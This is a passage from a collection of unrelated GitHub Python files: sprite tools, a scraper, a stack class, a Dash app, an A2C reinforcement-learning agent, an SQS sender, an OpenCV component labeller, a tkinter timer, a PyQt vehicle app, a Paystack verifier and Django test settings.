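assert sol.longestCommonPrefix(['flower', 'flow', 'flight']) == 'fl'
assert sol.longestCommonPrefix(['dog', 'racecar', 'car']) == ''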
scale_multiplier)\n\n spd = open(os.path.splitext(dds_path)[0] + '.spdspr', 'wb')\n sprite.write(spd)\n spd.close()\n\ndef GenerateSprSprite(tmx_path, scale_multiplier):\n sprite = spr_sprite_entry()\n \n tmx_metadata = utils.read_tmx_metadata(tmx_path) \n\n sprite.sprite_x_position = 0 \n sprite.sprite_y_position = 0 \n sprite.sprite_x_length = int(tmx_metadata[1] / scale_multiplier)\n sprite.sprite_y_length = int(tmx_metadata[2] / scale_multiplier)\n\n spr = open(os.path.splitext(tmx_path)[0] + '.sprt', 'wb')\n sprite.write(spr)\n \nargs = sys.argv\ndel args[0]\n\nfor arg in args:\n if os.path.splitext(arg)[1].lower() == '.dds':\n GenerateSpdSprite(arg, int(input(f'input the id of the generated sprite: ')),\n int(input(f'input the sprite scale mulitplier (2 for p5rpc, 1 for every other version of p5/r): ')))\n elif os.path.splitext(arg)[1] == '.tmx':\n GenerateSprSprite(arg, int(input('input the sprite scale divisor (2 for p4gpc, 4 for p3ppc, 1 for psp/vita): '))) \n","repo_name":"Secre-C/PersonaSpriteTools","sub_path":"GenerateSpriteEntryFromTexture.py","file_name":"GenerateSpriteEntryFromTexture.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"74156336575","text":"from bs4 import BeautifulSoup\nimport requests\n\nhtml_text = requests.get('https://music.163.com/#/user/songs/rank?id=302036076').text\n\nsoup = BeautifulSoup(html_text, 'lxml')\n\nprint(html_text)\n\nsongs = soup.find_all('b')\n\nfor song in songs:\n print(song.text)\n\n\n","repo_name":"MasonSyj/SoftwareToolsPartI","sub_path":"scrape/songs.py","file_name":"songs.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42631218995","text":"class Node:\r\n def __init__(self,value):\r\n self.value = value\r\n self.next=None\r\n\r\n\r\nclass Pila:\r\n def __init__(self):\r\n self.height = 0\r\n\r\n def push(self,value):\r\n new_nodo=Node(value)\r\n if self.height==0:\r\n self.top=new_nodo\r\n else:\r\n new_nodo.next=self.top\r\n self.top=new_nodo\r\n\r\n self.height +=1\r\n return\r\n def print_stack(self):\r\n tem=self.top\r\n while tem is not None:\r\n print(tem.value)\r\n tem=tem.next\r\n return\r\n\r\n def pop(self):\r\n tem=self.top\r\n self.top=tem.next\r\n tem.next=None\r\n self.height+=1\r\n return tem.value\r\n\r\nmy_pila=Pila()\r\nmy_pila.push(1)\r\nmy_pila.push(2)\r\nmy_pila.push(3)\r\nmy_pila.print_stack()\r\nprint(\"----------------------------------\")\r\nmy_pila.pop()\r\nprint(\"----------------------------------\")\r\nprint(my_pila.top.value)\r\nprint(\"----------------------------------\")\r\nmy_pila.print_stack()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Mauricio-Chavez/Pilas","sub_path":"Pila.py","file_name":"Pila.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20997808506","text":"import dash #creating a webpage\nimport dash_core_components as dcc #visual component\nimport dash_html_components as html\nimport plotly.graph_objs as go #employ graphics\nfrom dash.dependencies import Input, Output, State #calling the library\n\n\nlist_of_types=['Brick', 'Plate', 'Tile']\nlist_of_sizes=['1X2', '2X2', '2X4']\n\n\n########### Initiate the app (setting up html and css)\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = 
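Pila.pop in the stack record above has two latent bugs: it increments self.height instead of decrementing it, and it dereferences self.top without an empty check. A corrected sketch of just that method:

def pop(self):
    # Guard the empty case, then unlink the top node and shrink the count.
    if self.height == 0:
        return None
    tem = self.top
    self.top = tem.next
    tem.next = None
    self.height -= 1   # the record mistakenly used += 1 here
    return tem.value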
dash.Dash(__name__, external_stylesheets=external_stylesheets) #for dash to get the url to display the css style sheet\nserver = app.server\napp.title='LEGO Pieces'\n\n########### Set up the layout\n\napp.layout = html.Div(children=[\n html.Br(),\n html.H3('Which LEGO piece you will choose?'),\n html.Div([\n html.Div([\n dcc.RadioItems(\n id='pick-a-type',\n options=[\n {'label':list_of_types[0], 'value':list_of_types[0]},\n {'label':list_of_types[1], 'value':list_of_types[1]},\n {'label':list_of_types[2], 'value':list_of_types[2]},\n ],\n value='choose',\n ),\n ],className='two columns'),\n html.Div([\n dcc.RadioItems(\n id='pick-a-size',\n options=[\n {'label':list_of_sizes[0], 'value':list_of_sizes[0]},\n {'label':list_of_sizes[1], 'value':list_of_sizes[1]},\n {'label':list_of_sizes[2], 'value':list_of_sizes[2]},\n ],\n value='lego',\n ),\n ],className='two columns'),\n html.Div([\n html.Div(id='your_output_here', children=''),\n ],className='eight columns'),\n ],className='twelve columns'),\n html.Br(),\n html.A('Code on Github', href='https://github.com/caroleonor/GAMid_project'),\n html.Br(),\n html.A(\"Data Source\", href='https://brickarchitect.com/book/bricks'),\n ]\n)\n\n########## Callback\n\n@app.callback(Output('your_output_here', 'children'),\n [Input('pick-a-type', 'value'),\n Input('pick-a-size', 'value')])\ndef radio_results(type_you_picked, size_you_picked):\n image_you_chose=f'{type_you_picked}-{size_you_picked}.jpg'\n return html.Img(src=app.get_asset_url(image_you_chose), style={'width': 'auto', 'height': 'auto'}),\n\n############ Deploy\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"caroleonor/GAMid_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20301862631","text":"# IMPORTING LIBRARIES\n\nimport sys\nIN_COLAB = \"google.colab\" in sys.modules\n\nimport gym\nimport numpy as np\n\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nfrom tensorflow.keras import Model\n\nfrom IPython.display import clear_output\n\nclass Actor(Model):\n def __init__(self, state_size: int, action_size: int, \n ):\n \"\"\"Initialization.\"\"\"\n super(Actor, self).__init__()\n \n self.state_size = state_size\n self.action_size = action_size\n # set the hidden layers\n self.layer1 = tf.keras.layers.Dense(hidden_size, activation='relu')\n self.layer2 = tf.keras.layers.Dense(hidden_size, activation='relu')\n self.policy = tf.keras.layers.Dense(self.action_size,activation='softmax')\n\n def call(self, state):\n layer1 = self.layer1(state)\n layer2 = self.layer2(layer1)\n policy = self.policy(layer2)\n return policy\n \nclass CriticV(Model):\n def __init__(\n self, \n state_size: int, \n ):\n \"\"\"Initialize.\"\"\"\n super(CriticV, self).__init__()\n self.layer1 = tf.keras.layers.Dense(hidden_size, activation='relu')\n self.layer2 = tf.keras.layers.Dense(hidden_size, activation='relu')\n self.value = tf.keras.layers.Dense(1, activation = None)\n\n def call(self, state):\n layer1 = self.layer1(state)\n layer2 = self.layer2(layer1)\n value = self.value(layer2)\n return value\n\nclass DQNAgent:\n \"\"\"A2CAgent interacting with environment.\n \n Attributes:\n env (gym.Env): openAI Gym environment\n gamma (float): discount factor\n entropy_weight (float): rate of weighting entropy into the loss function\n actor (tf.keras.Model): target actor model to select actions\n critic (tf.keras.Model): critic model to predict 
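The two RadioItems in the Dash app above default to value='choose' and value='lego', which match none of their options, so the first callback fires with an image name that cannot exist in assets. A sketch of a safer default for the type picker (same pattern applies to the size picker; assumes asset files named like 'Brick-1X2.jpg'):

dcc.RadioItems(
    id='pick-a-type',
    options=[{'label': t, 'value': t} for t in list_of_types],
    value=list_of_types[0],   # default to a real option instead of 'choose'
)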
state values\n actor_optimizer (optim.Optimizer) : optimizer of actor\n critic_optimizer (optim.Optimizer) : optimizer of critic\n transition (list): temporory storage for the recent transition\n is_test (bool): flag to show the current mode (train / test)\n \"\"\"\n\n def __init__(\n self, \n env: gym.Env,\n ):\n \"\"\"Initialization.\n \n Args:\n env (gym.Env): openAI Gym environment\n gamma (float): discount factor\n \"\"\"\n \n # CREATING THE Q-Network\n self.env = env\n \n self.state_size = self.env.observation_space.shape[0]\n self.action_size = self.env.action_space.n\n \n self.actor_lr = 7e-3\n self.critic_lr = 7e-3\n self.gamma = 0.99 # discount rate\n self.actor = Actor(self.state_size, self.action_size\n )\n self.critic = CriticV(self.state_size\n )\n # self.a_opt = tf.keras.optimizers.RMSprop(learning_rate=1e-5)\n # self.c_opt = tf.keras.optimizers.RMSprop(learning_rate=1e-5)\n self.a_opt = tf.keras.optimizers.Adam(learning_rate=self.actor_lr)\n self.c_opt = tf.keras.optimizers.Adam(learning_rate=self.critic_lr)\n self.log_prob = None\n \n def get_action(self, state):\n prob = self.actor(np.array([state]))\n prob = prob.numpy()\n dist = tfp.distributions.Categorical(probs=prob, dtype=tf.float32)\n action = dist.sample()\n return int(action.numpy()[0])\n \n def actor_loss(self, prob, action, TDs):\n \n dist = tfp.distributions.Categorical(probs=prob, dtype=tf.float32)\n log_prob = dist.log_prob(action)\n loss = -log_prob*TDs\n return loss\n \n def n_step_td_target(self, states, actions, rewards, gamma):\n R_to_Go = 0\n discnt_rewards = []\n rewards.reverse()\n for r in rewards:\n R_to_Go = r + self.gamma*R_to_Go\n discnt_rewards.append(R_to_Go)\n discnt_rewards.reverse()\n states = np.array(states, dtype=np.float32)\n actions = np.array(actions, dtype=np.int32)\n discnt_rewards = np.array(discnt_rewards, dtype=np.float32)\n \n return states, actions, discnt_rewards\n \n def train_step(self, states, actions, discnt_rewards):\n discnt_rewards = tf.reshape(discnt_rewards, (len(discnt_rewards),))\n \n with tf.GradientTape() as tape1, tf.GradientTape() as tape2:\n \n curr_Ps = self.actor(states, training=True)\n curr_Qs = self.critic(states,training=True)\n curr_Qs = tf.reshape(curr_Qs, (len(curr_Qs),))\n \n TDs = tf.math.subtract(discnt_rewards, curr_Qs)\n \n critic_loss = 0.5 * kls.mean_squared_error(discnt_rewards, curr_Qs)\n actor_loss = self.actor_loss(curr_Ps, actions, TDs)\n \n actorGrads = tape1.gradient(actor_loss, self.actor.trainable_variables)\n criticGrads = tape2.gradient(critic_loss, self.critic.trainable_variables)\n self.a_opt.apply_gradients(zip(actorGrads, self.actor.trainable_variables))\n self.c_opt.apply_gradients(zip(criticGrads, self.critic.trainable_variables))\n \n return actor_loss, critic_loss\n\nseed = 1234\n# CREATING THE ENVIRONMENT\nenv_name = \"CartPole-v0\"\nenv = gym.make(env_name)\nenv.seed(seed) # reproducible, general Policy gradient has high variance\n\n# INITIALIZING THE Q-PARAMETERS\nhidden_size = 64\nmax_episodes = 300 # Set total number of episodes to train agent on.\n\n# train\nagent = DQNAgent(\n env, \n# memory_size, \n# batch_size, \n# epsilon_decay,\n)\n\nif __name__ == \"__main__\":\n tf.random.set_seed(336699)\n # 2.5 TRAINING LOOP\n #List to contain all the rewards of all the episodes given to the agent\n scores = []\n \n # EACH EPISODE \n for episode in range(max_episodes):\n ## Reset environment and get first new observation\n state = agent.env.reset()\n episode_reward = 0\n done = False # has the enviroment finished?\n \n states = 
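train_step in the A2C record calls kls.mean_squared_error, but kls is never imported anywhere in the file. Assuming tf.keras.losses was intended (its conventional alias in A2C tutorials), the missing line and the call it serves are:

import tensorflow.keras.losses as kls

# inside train_step, as written in the record:
# critic_loss = 0.5 * kls.mean_squared_error(discnt_rewards, curr_Qs)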
[]\n actions = []\n rewards = []\n \n # EACH TIME STEP \n while not done:\n # for step in range(max_steps): # step index, maximum step is 200\n action = agent.get_action(state)\n \n # TAKING ACTION\n next_state, reward, done, _ = agent.env.step(action)\n \n states.append(state)\n actions.append(action)\n rewards.append(reward)\n \n # Our new state is state\n state = next_state\n \n episode_reward += reward\n\n # if episode ends\n if done:\n scores.append(episode_reward)\n print(\"Episode \" + str(episode+1) + \": \" + str(episode_reward))\n \n states, actions, discnt_rewards = agent.n_step_td_target(states, actions, rewards, 1)\n actor_loss, critic_loss = agent.train_step(states, actions, discnt_rewards) \n break\n\n","repo_name":"RichardMinsooGo-RL-Gym/Bible_4_PI_TF2_A_ActorCritic_Policy_Iterations","sub_path":"TF2_A_PI_43_A2C.py","file_name":"TF2_A_PI_43_A2C.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"8564518383","text":"import boto3\n#import json to pass our messages in json format\nimport json\nsqs = boto3.resource('sqs')\n#mention the queue name where the message needs to be sent\nqueue = sqs.get_queue_by_name(QueueName='#queuename')\n#pass your message here which should be your job details\n#this can also be variablized. Pass job variables if it has been created\nj_msg = {\n \"created\":\"-\",\n \"group\":groupName,\n \"project\":\"#projectname\",\n \"version\":\"#version\",\n \"environment\":\"#enviromentname\",\n \"job\":\"#jobtotrigger\"\n}\n#multiple messages can be sent which can be treated as multiple triggers\nk_msg = {\n \"created\":\"-\",\n \"group\":groupName,\n \"project\":\"#projectname\",\n \"version\":\"#version\",\n \"environment\":\"#enviromentname\",\n \"job\":\"#jobtotrigger\"\n}\n#A response is generated only if a message is sent\nresponse1 = queue.send_message(MessageBody=json.dumps(j_msg))\nresponse2 = queue.send_message(MessageBody=json.dumps(k_msg))\nprint(response1['MessageId'])\nprint(response2['MessageId'])\n","repo_name":"mmdanas/AWS","sub_path":"SQS/SQS_Trigger_Matillion.py","file_name":"SQS_Trigger_Matillion.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9337621624","text":"#Problema1. Scrivere una funzione ricorsiva che, data una lista L di stringhe, \n# restituisce come risultato una stringa formata dalla concatenazione di tutte le stringhe in L aventi lunghezza dispari.\n# Se la lista non contiene stringhe di lunghezza dispari, la funzione restituisce la stringa vuota.\n\ndef ricorsione(l,s):\n if len(l)==0:\n if s==\"\":\n return False\n else:\n return s\n else:\n if len(l[0])%2==0:\n return ricorsione(l[1:],s+l[0])\n else:\n return ricorsione(l[1:],s)\n \n \nprint(ricorsione([\"ejwb\",\"weuihp\",\"ewruoò\",\"wiohegweifphg\"],\"\"))","repo_name":"davidbelfiori/Foi","sub_path":"eserciziesame/ricorsionees1luglio2018.py","file_name":"ricorsionees1luglio2018.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27755212337","text":"from ase.data import atomic_masses, atomic_numbers\n\ndef atomic_masses(atoms_object) :\n \"\"\"Returns the sum of the atomic masses for the molecule/elements specified by symbol\n in the config-file. 
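The Italian docstring in the recursion record translates to: "Write a recursive function that, given a list L of strings, returns the concatenation of all strings in L having odd length; if the list contains no odd-length strings, return the empty string." The record's code does the opposite on both counts: it keeps even-length strings (len % 2 == 0) and returns False instead of ''. A sketch matching the stated exercise:

def concat_odd(l, s=''):
    # Recursive, per the exercise: keep odd-length strings, '' if none exist.
    if not l:
        return s
    if len(l[0]) % 2 == 1:            # odd length -> keep
        return concat_odd(l[1:], s + l[0])
    return concat_odd(l[1:], s)

assert concat_odd(['ab', 'abc', 'x']) == 'abcx'
assert concat_odd(['ab', 'abcd']) == ''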
It however does this by looking at the atoms_object and retrieving\n one molecule from one point in the lattice, i.e. it does not look in the config_file.\n This requires the set_tag function of Atoms() to save the size of the super cell\n when the atoms object is created by create_atoms()\"\"\"\n all_masses = atoms_object.get_masses()\n size_cube = atoms_object.get_tags()[0]**3 # Tag should contain the size of super cell\n number_of_atoms = int(len(all_masses) / size_cube) # Number of atoms per molecule\n molecule_masses = all_masses[0:number_of_atoms] #Retrieve masses from one molecule\n\n return sum(molecule_masses)\n","repo_name":"martinclason/Molecular-Dynamics-Project","sub_path":"ale/atomic_masses.py","file_name":"atomic_masses.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32430768496","text":"import cv2\r\nimport numpy as np\r\n# filename='original.png'\r\nfilename='noise.png'\r\nimg = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\r\ncv2.namedWindow('main')\r\ncv2.imshow('main',img)\r\ncv2.waitKey(0)\r\n\r\n# MEDIAN_FILTER TO REMOVE NOISE FROM IMG\r\n\r\ndef median_filter(noise_img):\r\n final = noise_img[:]\r\n for y in range(len(noise_img)):\r\n for x in range(y):\r\n final[y, x] = noise_img[y, x]\r\n kernel = [noise_img[0, 0]] * 9\r\n for y in range(1, len(noise_img) - 1):\r\n for x in range(1, noise_img.shape[1] - 1):\r\n kernel[0] = noise_img[y - 1, x - 1]\r\n kernel[1] = noise_img[y, x - 1]\r\n kernel[2] = noise_img[y + 1, x - 1]\r\n kernel[3] = noise_img[y - 1, x]\r\n kernel[4] = noise_img[y, x]\r\n kernel[5] = noise_img[y + 1, x]\r\n kernel[6] = noise_img[y - 1, x + 1]\r\n kernel[7] = noise_img[y, x + 1]\r\n kernel[8] = noise_img[y + 1, x + 1]\r\n\r\n kernel.sort()\r\n final[y, x] = kernel[4]\r\n return final\r\n\r\n\r\nblur_img=median_filter(img)\r\ncv2.namedWindow('main2')\r\ncv2.imshow('main2', blur_img) # FINAL=IMG WITHOUT NOISE\r\ncv2.waitKey(0)\r\n# blur_img=cv2.imwrite('C:/Users/Roumk/OneDrive/Υπολογιστής/HW_1', blur_img)\r\n\r\n# CONVERT BLUR_IMG TO BINARY\r\nret,thresh_img = cv2.threshold(blur_img, 20, 255, cv2.THRESH_BINARY)\r\n\r\n# VIEW BINARY IMG\r\ncv2.imshow('threshold',thresh_img)\r\ncv2.waitKey(0)\r\n\r\n# FUNCTION THAT FINDS INTEGRAL\r\ndef my_integral(image):\r\n N = len(image)\r\n M = len(image[0])\r\n array_of_sums = np.empty([N, M], dtype=int)\r\n\r\n for i in range(0, N, 1):\r\n sum = 0\r\n for j in range(0, M, 1):\r\n sum = image[i][j] + sum\r\n array_of_sums[i][j] = sum\r\n\r\n for i in range(1, N, 1):\r\n for j in range(M-1, -1, -1):\r\n array_of_sums[i][j] += array_of_sums[i - 1][j]\r\n\r\n col = np.array([np.zeros(N + 1)])\r\n row = np.array([np.zeros(M)])\r\n row_arr = np.insert(array_of_sums, 0, row, axis=0)\r\n final_arr = np.insert(row_arr, 0, col, axis=1)\r\n\r\n return final_arr\r\n\r\n\r\ndef integral_sum(new_array,si,sj,ei,ej):\r\n sum = new_array[ei, ej] - new_array[ei, sj] - new_array[si, ej] + new_array[si, sj]\r\n return sum\r\n\r\n\r\n\r\n\r\n\r\n# FUNCTION TO RETURN FINAL_IMG\r\ndef connected_components(new_img):\r\n final_img = cv2.cvtColor(blur_img, cv2.COLOR_GRAY2BGR)\r\n item = my_integral(blur_img)\r\n output = cv2.connectedComponentsWithStats(thresh_img, 8, cv2.CV_32S)\r\n num_labels = output[0] # The first cell is the number of labels\r\n labels = output[1] # The second cell is the label matrix\r\n values = output[2] # The third cell is the stat matrix\r\n centroids = output[3] # The fourth cell is the centroid matrix\r\n 
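The function above shadows the atomic_masses array it just imported from ase.data, making that import unusable inside the module (atomic_numbers is never used either). A sketch that keeps the same computation without the name collision (the renamed helper is hypothetical):

from ase import Atoms

def molecule_mass(atoms_object: Atoms) -> float:
    # Same logic as the record: masses of one molecule at one lattice point,
    # with the super-cell size recovered from the tag set at creation time.
    all_masses = atoms_object.get_masses()
    size_cube = atoms_object.get_tags()[0] ** 3
    atoms_per_molecule = int(len(all_masses) / size_cube)
    return sum(all_masses[:atoms_per_molecule])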
j=0 # initialize counter\r\n for i in range(1,num_labels):\r\n area=values[i,cv2.CC_STAT_AREA]\r\n\r\n if area>10:\r\n j=j+1 # counter\r\n x1 = values[i, cv2.CC_STAT_LEFT]\r\n y1 = values[i, cv2.CC_STAT_TOP]\r\n w = values[i, cv2.CC_STAT_WIDTH]\r\n h = values[i, cv2.CC_STAT_HEIGHT]\r\n\r\n # CORDINATE FOR BOUNDING BOX\r\n pt1 = (x1, y1)\r\n pt2 = (x1 + w, y1 + h)\r\n (X, Y) = centroids[i]\r\n box_sum=integral_sum(item,y1,x1,y1+h,x1+w)\r\n average=box_sum/(w*h)\r\n # BOUNDING BOXES FOR EACH ELEMENT\r\n color=(0,0,255)\r\n cv2.rectangle(final_img, pt1, pt2, color, 1)\r\n # PUT TEXT IN IMG\r\n\r\n # font = cv2.FONT_HERSHEY_SIMPLEX\r\n font = cv2.FONT_HERSHEY_COMPLEX_SMALL\r\n org = (x1,y1+int(h/2))\r\n fontScale=1\r\n color=(0,0,255)\r\n thickness=1\r\n new_img = cv2.putText(final_img, str(j), org, font, fontScale, color, thickness, cv2.LINE_AA)\r\n # PRINTS\r\n print(f'----Region'f'{j} : ----')\r\n print(f'Area(px)'f':', area)\r\n print(f'Bounding Box Area(px)'f' :', w * h)\r\n print(f'Mean graylevel value in bounding box 'f' :', average)\r\n return new_img\r\n\r\nfinal_img=connected_components(thresh_img)\r\ncv2.imshow('final_img',final_img )\r\ncv2.waitKey(0)\r\npor=cv2.imwrite('noise_final_img.png',final_img)\r\nprint(por)\r\n\r\n\r\n","repo_name":"kostasroumo/ComputersVision_1_denoised","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22319139363","text":"from tkinter import *\nimport math\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nCHECK_MARK = \"✔\"\nreps = 0\ncheck_mark_multiplier = 1\ntimer = None\n\n# ---------------------------- TIMER RESET ------------------------------- # \n\ndef reset():\n\n global reps\n global check_mark_multiplier\n\n window.after_cancel(timer) # It works but it throws this error on VsCode\n timer_label.config(text=\"Timer\", fg=GREEN)\n canvas.itemconfig(timer_text, text=\"00:00\")\n check.config(text=\"\")\n reps = 0\n check_mark_multiplier = 1\n\n# ---------------------------- TIMER MECHANISM ------------------------------- # \n\ndef start():\n global reps\n\n reps += 1\n\n work_sec = WORK_MIN * 60\n short_break_sec = SHORT_BREAK_MIN * 60\n long_break_sec = LONG_BREAK_MIN * 60\n\n if reps % 8 == 0:\n countdown(long_break_sec)\n timer_label.config(text=\"Break\", fg=RED)\n elif reps % 2 == 0:\n countdown(short_break_sec)\n timer_label.config(text=\"Break\", fg=PINK)\n else:\n countdown(work_sec)\n timer_label.config(text=\"Work\", fg=GREEN)\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- # \n\ndef countdown(count):\n\n global check_mark_multiplier\n\n count_min = math.floor(count / 60)\n\n count_sec = count % 60\n if count_sec < 10:\n count_sec = f\"0{count_sec}\"\n\n canvas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n if count > 0:\n global timer\n timer = window.after(1000, countdown, count -1)\n else:\n start()\n if reps % 2 == 0:\n check.config(text=f\"{CHECK_MARK*check_mark_multiplier}\")\n check_mark_multiplier += 1\n \n# ---------------------------- UI SETUP ------------------------------- #\n\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\ntimer_label = Label(text=\"Timer\", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 
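In median_filter above, `final = noise_img[:]` returns a numpy view, not a copy, so each median written into final immediately contaminates the neighbourhood read for the next pixel. A compact corrected sketch of the same 3x3 filter:

import numpy as np

def median_filter_fixed(noise_img: np.ndarray) -> np.ndarray:
    final = noise_img.copy()   # real copy: reads stay on the original pixels
    for y in range(1, noise_img.shape[0] - 1):
        for x in range(1, noise_img.shape[1] - 1):
            final[y, x] = np.median(noise_img[y - 1:y + 2, x - 1:x + 2])
    return final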
35, \"bold\"))\ntimer_label.grid(column=1, row=0)\n\ncanvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"Udemy/28-day/tomato.png\")\ncanvas.create_image(100, 112, image=tomato_img)\ntimer_text = canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncanvas.grid(column=1, row=1)\n\nstart_button = Button(text=\"Start\", command=start, justify=\"right\")\nstart_button.grid(column=0, row=2)\n\nreset_button = Button(text=\"Reset\", command=reset, justify=\"left\")\nreset_button.grid(column=2, row=2)\n\ncheck = Label(text=\"\", fg=GREEN, bg=YELLOW)\ncheck.grid(column=1, row=3)\n\n\nwindow.mainloop()","repo_name":"Sfrancinelli/Python","sub_path":"Udemy/28-day/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"23178796038","text":"import uimain\nfrom Info import InfoWindow\nfrom db import ControlGSM\nfrom AddEditVehicle import AddEditVehicleWindow\n\nimport sys\nfrom PyQt5 import QtWidgets, QtCore\n\nc = ControlGSM(\"information.db\")\n\nclass App(QtWidgets.QMainWindow, uimain.Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n self.treeWidget.itemDoubleClicked.connect(self.openVehicleInfo)\n self.setTypesBox()\n self.vehicleType.currentIndexChanged.connect(self.typeChanged)\n self.typeChanged()\n\n self.addButton.clicked.connect(self.addButtonClick)\n self.editButton.clicked.connect(self.editButtonClick)\n self.delButton.clicked.connect(self.delButtonClick)\n\n def addButtonClick(self):\n self.addForm = AddEditVehicleWindow(self, AddEditVehicleWindow.Add, self.vehicleType.currentData())\n self.addForm.show()\n\n def editButtonClick(self):\n v = self.treeWidget.currentItem()\n if not v:\n return\n self.addForm = AddEditVehicleWindow(self, AddEditVehicleWindow.Edit, vehicle = int(v.text(0)))\n self.addForm.show()\n\n def delButtonClick(self):\n v = self.treeWidget.currentItem()\n if not v:\n return\n if c.isDelete(self, \"эту технику из базы\"):\n if c.delVehicle(int(v.text(0))):\n self.typeChanged()\n else:\n s = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Critical, \"Ошибка\", \"Ошибка\")\n return\n\n def openVehicleInfo(self):\n self.info = InfoWindow(self, int(self.treeWidget.currentItem().text(0)))\n self.info.show()\n\n def typeChanged(self):\n index = self.vehicleType.currentData()\n vehicles = c.getVehicles(index)\n self.treeWidget.clear()\n\n for v in vehicles:\n item = QtWidgets.QTreeWidgetItem(self.treeWidget)\n info = c.vehicleInfo(v[\"ID\"])\n item.setText(0, str(v[\"ID\"]))\n item.setText(1, info[\"Number\"])\n item.setText(2, info[\"Name\"])\n item.setText(3, str(info[\"Mileage\"]))\n item.setText(4, \"%.2f\" % info[\"Oil\"])\n\n for i in range(self.treeWidget.columnCount()):\n self.treeWidget.resizeColumnToContents(i)\n\n def setTypesBox(self):\n items = c.getTypes()\n if items:\n for item in items:\n self.vehicleType.addItem(item['Name'], item['ID'])\n\ndef main():\n try:\n app = QtWidgets.QApplication(sys.argv)\n window = App()\n window.show()\n app.exec_()\n except Exception as err:\n print(\"Error: %s\" % err)\n raise\n\nif __name__ == \"__main__\":\n main()","repo_name":"batuevdm/control-gsm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20834154450","text":"import requests\nfrom 
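The Pomodoro record's own comment in reset() ("It works but it throws this error on VsCode") points at the cause: window.after_cancel(timer) is invalid when Reset is pressed before Start, while timer is still None. A guarded drop-in sketch, assuming the record's globals:

def reset():
    # Only cancel a countdown that was actually scheduled.
    global reps, check_mark_multiplier, timer
    if timer is not None:
        window.after_cancel(timer)
        timer = None
    timer_label.config(text="Timer", fg=GREEN)
    canvas.itemconfig(timer_text, text="00:00")
    check.config(text="")
    reps = 0
    check_mark_multiplier = 1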
django.conf import settings\n\nclass Paystack():\n def __init__(self,*args,**kwargs):\n\n self.base_url = 'https://api.paystack.co'\n self.SECRET_KEYS = settings.PAYSTACK_SECRET_KEYS \n self.PUBLIC_KEYS = settings.PAYSTACK_PUBLICK_KEYS\n def verify_payment(self,ref,*args,**kwargs):\n path = f'/transaction/verify/{ref}'\n headers = {\n 'Authorization':f\"Bearer {self.SECRET_KEYS}\",\n 'Content-type':'application/json',\n }\n\n url = self.base_url + path\n response = requests.get(url,headers = headers)\n if response.status_code ==200:\n response_data = response.json()\n return response_data['status'],response_data['data']\n response_data = response.json()\n return response_data['status'],response_data['message']","repo_name":"Imotechs/Oma.org","sub_path":"users/paystack.py","file_name":"paystack.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"658067693","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport django\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': ':memory:',\n }\n}\nTIME_ZONE = 'Europe/Berlin'\nLANGUAGE_CODE = 'en-us'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nMEDIA_URL = '/media/'\nSTATIC_URL = '/static/'\nSECRET_KEY = 'test-secret-key'\nROOT_URLCONF = 'tests.urls'\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'taggit',\n 'cosinnus',\n 'cosinnus_note',\n 'tests',\n)\nif django.VERSION[:2] < (1, 6):\n TEST_RUNNER 